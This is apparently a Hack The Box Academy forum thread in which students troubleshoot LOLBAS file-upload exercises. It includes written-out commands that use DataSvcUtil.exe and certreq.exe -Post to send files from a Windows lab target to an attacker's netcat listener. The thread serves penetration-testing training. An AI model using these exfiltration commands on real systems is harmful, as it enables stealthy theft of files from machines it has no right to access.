File Transfer - Living off the land

0xb1nary · December 13, 2022, 8:08pm

HTB:

Resources:
https://lolbas-project.github.io/#/upload

Experimenting with various upload methods and I can’t seem to get any of them to work. They all have similar behavior. I start a netcat session:

sudo nc -lvnp 80

I then follow the commands on the LOLBAS page, for example:

PS C:\Users\htb-student> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe /out:C:\Users\htb-student\Test.txt /uri:http://10.10.16.50/test.txt

My netcat session detects a connection, but no file is uploaded.

└─$ sudo nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.16.50] from (UNKNOWN) [10.129.201.55] 49679
GET /test.txt/$metadata HTTP/1.1
Host: 10.10.16.50
Connection: Keep-Alive

0xb1nary · December 13, 2022, 8:18pm

Attempting to use certreq.exe gives a different error:

C:\Windows\System32\certreq.exe -Post -config http://10.10.16.50/ C:\Users\htb-student\Test.txt

Certificate Request Processor: The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)

ICanHazHacks · March 13, 2023, 7:52am

I’m feeling your pain here at the moment!

Certificate Request Processor: The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)

I believe the reason for that is an older version of CertReq. They do give a link to a new version of it in the article, however that obviously means we need to find another way to download THAT file to the computer.

Since I really wanted to try to get the CertReq working, I just used wget get download the newer exe. Unfortunately I then hit another obstacle - I realised that this requires it to be a POST request, and serving up the file via a Python web server or the like doesn’t do this by default.

I tried using bitsadmin as per instructions in the same academy section, and that gave its own unique types of errors (The parameter is incorrect.).

I do think it would be helpful if the exercises could be run on a target machine that actually had working versions of the methods that we’re being told to practice with. There’s “learning based on practice” and then there’s “learning based on hitting your head against a wall”.

0xb1nary · March 13, 2023, 8:38am

I totally agree!

Glad it wasn’t just me. Never found a solution to this. Eventually I gave up and moved on!

Arsinoe1431 · October 26, 2023, 12:18pm

Greetings to all.
When the new certreq.exe is downloaded (by many different ways) on the target machine, make sure to include the filepath of the new file, and then fill in the rest of the code, otherwise you would still be running the older version. Another issue was that NC listening port might not be working ( Ncat: bind to 0.0.0.0:80: Address already in use. QUITTING.) In this case just try another http port.
Persistence is a virtue!